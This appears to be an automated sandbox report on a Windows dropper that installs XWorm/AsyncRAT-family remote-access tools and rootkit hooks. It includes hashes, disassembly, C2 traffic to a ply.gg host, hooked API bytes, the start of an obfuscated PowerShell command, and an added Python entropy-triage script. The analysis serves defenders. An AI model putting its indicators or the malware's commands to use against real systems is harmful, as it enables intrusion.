• Win32 Executable (generic) a (10002005/4) 99.94%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name:aoKTzGQSRP.exe
File size:10'214'400 bytes
MD5:86357c1fffbe566da1d9903ab765f921
SHA1:1d55db2dd9e556ff066e297273e402130adf515f
SHA256:202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf
SHA512:c181397112d6600d161033ee2316478358250a7afe8822999b554af1ea01544612665722800ba4fd8e2e1ad4a68a596c4370d52795428f1b43840d801d107d60
SSDEEP:196608:lW4hA5uDoRign+zgad1nu8Qely82mqwmjYBj5jY+MZ+yBSJ84k:lW4hXciVguRrlPqw4iY+q4/k
TLSH:46A62361E994EA69C2114D7CE502ECF015206F86D14CACAB2CE6FEFFB0716E547BC1A1
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.................................................@..................................=.....................................
Icon Hash:0f3331332b308228
Entrypoint:0x401481
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:(none)
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:(none)
CLR (.Net) Version:(none)
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:6f462fcc6b830b77fb3fef2add9dc570
Instruction (disassembly at the entrypoint, 0x401481)
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007FA97D2B1AEDh
add esp, 0Ch
mov eax, 0040145Fh
push eax
call 00007FA97D2B1B2Fh
mov eax, 00000001h
push eax
call 00007FA97D2B1B2Ch
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007FA97D2B1B20h
add esp, 08h
mov eax, dword ptr [00DAE1F8h]
mov ecx, dword ptr [00DAE1FCh]
mov edx, dword ptr [00DAE200h]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [00DAF000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007FA97D2B1AFAh
add esp, 14h
mov eax, dword ptr [00DAE1F8h]
mov ecx, dword ptr [00DAE1FCh]
mov edx, dword ptr [00DAE200h]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007FA97D2B18CCh
add esp, 0Ch
push eax
call 00007FA97D2B1AD0h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [00DAE1F8h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ae180 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9b0000 | 0x10bd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x9ae1d0 | 0x5c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x620 | 0x800 | 9326e31db87e6638966332073294d880 | False | 0.38818359375 | data | 4.412233120079829 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x9ac394 | 0x9ac400 | 42bb99dd4aeb56834592a750c0c331c3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x9af000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x9b0000 | 0x10bd0 | 0x10c00 | ef37ea2f40c12f9c6e7d3ac09371fa4f | False | 0.05540170242537314 | data | 1.6779452272521669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x9b00e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | - | - | 0.04860700343073465
RT_GROUP_ICON | 0x9c0910 | 0x14 | data | - | - | 1.0
RT_MANIFEST | 0x9c0924 | 0x2ab | XML 1.0 document, ASCII text | English | United States | 0.4743777452415813
Imports
DLL | Import
msvcrt.dll | malloc, _sleep, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll | ShellExecuteA
kernel32.dll | SetUnhandledExceptionFilter
Language of compilation system | Country where language is spoken | Map
English | United States | -
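The static data above (a 0x800-byte .text next to a ~10 MB .rdata, a zeroed TimeDateStamp, RELOCS_STRIPPED, file entropy 7.98, and imports limited to fopen/fwrite/fclose/ShellExecuteA) is what a first-pass triage script should surface before any dynamic analysis. The following is an added example, not Joe Sandbox code and not code from the sample: it parses a PE32/PE32+ section table with only the standard library, computes per-section Shannon entropy, and reports the same header oddities the report lists. The entropy cut-off (7.0 bits/byte over at least 4 KiB), the "code is under 1% of the file" rule and the constructed test image `build_sample_pe()` (which mimics the report's layout, but is not the analysed file) are all assumptions made for the example.

```python
import math
import random
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001      # winnt.h COFF characteristic
IMAGE_SCN_CNT_CODE = 0x00000020          # winnt.h section characteristics
IMAGE_SCN_MEM_EXECUTE = 0x20000000
ENTROPY_THRESHOLD = 7.0                  # assumption: >= 7 bits/byte over >= 4 KiB reads as packed/encrypted
CODE_FRACTION_THRESHOLD = 0.01           # assumption: executable bytes under 1% of the file is a stub-sized loader


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", pe, opt)        # 0x10b = PE32, 0x20b = PE32+
    entry, = struct.unpack_from("<I", pe, opt + 16)   # AddressOfEntryPoint (RVA)
    sections = []
    for i in range(nsec):
        hdr = struct.unpack_from("<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        name, vsize, vaddr, rsize, rptr, sch = hdr[0], hdr[1], hdr[2], hdr[3], hdr[4], hdr[9]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "raw_size": rsize,
                         "characteristics": sch, "entropy": shannon_entropy(pe[rptr:rptr + rsize])})
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "magic": magic, "entrypoint": entry, "sections": sections}


def triage(pe: bytes) -> dict:
    """Return the static indicators a first-pass reviewer wants, plus human-readable findings."""
    info = parse_pe(pe)
    findings, high, code_raw = [], [], 0
    if info["timestamp"] == 0:
        findings.append("TimeDateStamp is 0 (build time deliberately blanked)")
    relocs_stripped = bool(info["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED)
    if relocs_stripped:
        findings.append("RELOCS_STRIPPED set: image cannot be rebased, so it never gets ASLR")
    for s in info["sections"]:
        if s["characteristics"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
            code_raw += s["raw_size"]
        if s["entropy"] >= ENTROPY_THRESHOLD and s["raw_size"] >= 0x1000:
            high.append(s["name"])
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f} over {s['raw_size']:#x} raw bytes "
                            f"({100 * s['raw_size'] / len(pe):.0f}% of file): packed or embedded payload")
    code_fraction = code_raw / len(pe)
    if code_fraction < CODE_FRACTION_THRESHOLD:
        findings.append(f"executable sections are {code_fraction:.2%} of the file: stub-sized loader")
    return {"timestamp_zero": info["timestamp"] == 0, "relocs_stripped": relocs_stripped,
            "high_entropy_sections": high, "code_fraction": code_fraction,
            "sections": info["sections"], "findings": findings}


def build_sample_pe(packed: bool = True, seed: int = 1) -> bytes:
    """Constructed PE32 test image (not the analysed sample): tiny .text, 64 KiB .rdata,
    zero timestamp, relocations stripped. packed=True fills .rdata with pseudo-random bytes."""
    rng = random.Random(seed)
    # push ebp; mov ebp,esp; sub esp,8; nop; leave; ret, then zero padding
    text = b"\x55\x89\xe5\x83\xec\x08\x90\xc9\xc3".ljust(0x200, b"\x00")
    if packed:
        rdata = bytes(rng.getrandbits(8) for _ in range(0x10000))
    else:
        rdata = (b"config=1\n" * (0x10000 // 9)).ljust(0x10000, b"\x00")
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    # i386, 2 sections, TimeDateStamp 0, PE32 optional header, RELOCS_STRIPPED|EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0103)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase

    def sec(name, vsize, vaddr, rsize, rptr, ch):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, rptr, 0, 0, 0, 0, ch)

    hdrs = (sec(b".text", 0x200, 0x1000, 0x200, 0x200, 0x60000020)          # CODE|EXECUTE|READ
            + sec(b".rdata", 0x10000, 0x2000, 0x10000, 0x400, 0x40000040))  # INITIALIZED_DATA|READ
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(0x200, b"\x00")
    return header + text + rdata


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for line in triage(image)["findings"]:
        print("-", line)
```

Run it with a file path to triage a real image, or with no argument to triage the constructed sample. The sectional entropy is the useful signal here: a whole-file entropy of 7.98 tells you something is packed, but the per-section view tells you where the payload sits (the data section) and how small the actual code is, which is what makes carving the embedded file out of .rdata the obvious next step.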
Suricata IDS alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T19:38:22.499718+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49997 | 147.185.221.212 | 8600 | TCP
(The destination address and port are not delimited in the extracted text; the split above is the most likely reading, the alternative being 147.185.221.21:28600.)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 19:37:10.435028076 CEST | 60158 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 19:37:10.446355104 CEST | 53 | 60158 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 19:37:14.045494080 CEST | 56192 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 19:37:14.053606033 CEST | 53 | 56192 | 1.1.1.1 | 192.168.2.6
Oct 22, 2024 19:37:20.057557106 CEST | 55510 | 53 | 192.168.2.6 | 1.1.1.1
Oct 22, 2024 19:37:20.075754881 CEST | 53 | 55510 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 19:37:10.435028076 CEST | 192.168.2.6 | 1.1.1.1 | 0x82f8 | Standard query (0) | dashboard.botghost.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 19:37:14.045494080 CEST | 192.168.2.6 | 1.1.1.1 | 0x154a | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 19:37:20.057557106 CEST | 192.168.2.6 | 1.1.1.1 | 0xaa79 | Standard query (0) | subscribe-bond.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 19:37:10.446355104 CEST | 1.1.1.1 | 192.168.2.6 | 0x82f8 | No error (0) | dashboard.botghost.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 19:37:10.446355104 CEST | 1.1.1.1 | 192.168.2.6 | 0x82f8 | No error (0) | dashboard.botghost.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 19:37:14.053606033 CEST | 1.1.1.1 | 192.168.2.6 | 0x154a | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 19:37:20.075754881 CEST | 1.1.1.1 | 192.168.2.6 | 0xaa79 | No error (0) | subscribe-bond.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49729 | 208.95.112.1 | 80 | 4188 | C:\Users\Public\DeadROOTkit.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 19:37:14.081002951 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Oct 22, 2024 19:37:14.661644936 CEST | 174 | IN | HTTP/1.1 200 OK
    Date: Tue, 22 Oct 2024 17:37:13 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 5
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 74 72 75 65 0a
    Data Ascii: true


Code Manipulations

Function Name | Hook Type | Active in Processes
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
ZwResumeThread | INLINE | winlogon.exe, explorer.exe
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
                                                                                                                                                                                NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                                                                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                                                                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                                                                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                                                                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                                                                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                                                                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                                                                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF


Target ID: 0
Start time: 13:37:00
Start date: 22/10/2024
Path: C:\Users\user\Desktop\aoKTzGQSRP.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\aoKTzGQSRP.exe"
Imagebase: 0x400000
File size: 10'214'400 bytes
MD5 hash: 86357C1FFFBE566DA1D9903AB765F921
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:37:04
Start date: 22/10/2024
Path: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
Imagebase: 0x7ff6fabe0000
File size: 9'629'457 bytes
MD5 hash: CC32561980C2400C490A4849C78E38ED
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 34%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 13:37:04
Start date: 22/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:37:04
Start date: 22/10/2024
Path: C:\Users\user\AppData\Local\Temp\1.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\1.exe"
Imagebase: 0xc90000
File size: 512'512 bytes
MD5 hash: E1C82191B678CEA8F3C996887DDC1232
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2208653873.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 74%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 5
Start time: 13:37:05
Start date: 22/10/2024
Path: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe"
Imagebase: 0x7ff6fabe0000
File size: 9'629'457 bytes
MD5 hash: CC32561980C2400C490A4849C78E38ED
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 6
Start time: 13:37:09
Start date: 22/10/2024
Path: C:\Users\Public\DeadXClient.exe
Wow64 process (32bit): false
Commandline: "C:\Users\Public\DeadXClient.exe"
Imagebase: 0xc60000
File size: 35'840 bytes
MD5 hash: F1976EA02BFFAEF5AC943C2ABBB7426C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000000.2202434236.0000000000C62000.00000002.00000001.01000000.0000001A.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 87%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\DeadROOTkit.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\DeadROOTkit.exe"
                                                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                                                File size:43'520 bytes
                                                                                                                                                                                MD5 hash:7DD98FC2976EE270A278E1A9A28EEFAE
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp, Author: ditekSHen
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 81%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\DeadCodeRootKit.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\Public\DeadCodeRootKit.exe"
                                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                                File size:155'136 bytes
                                                                                                                                                                                MD5 hash:B8479A23C22CF6FC456E197939284069
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:13:37:09
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 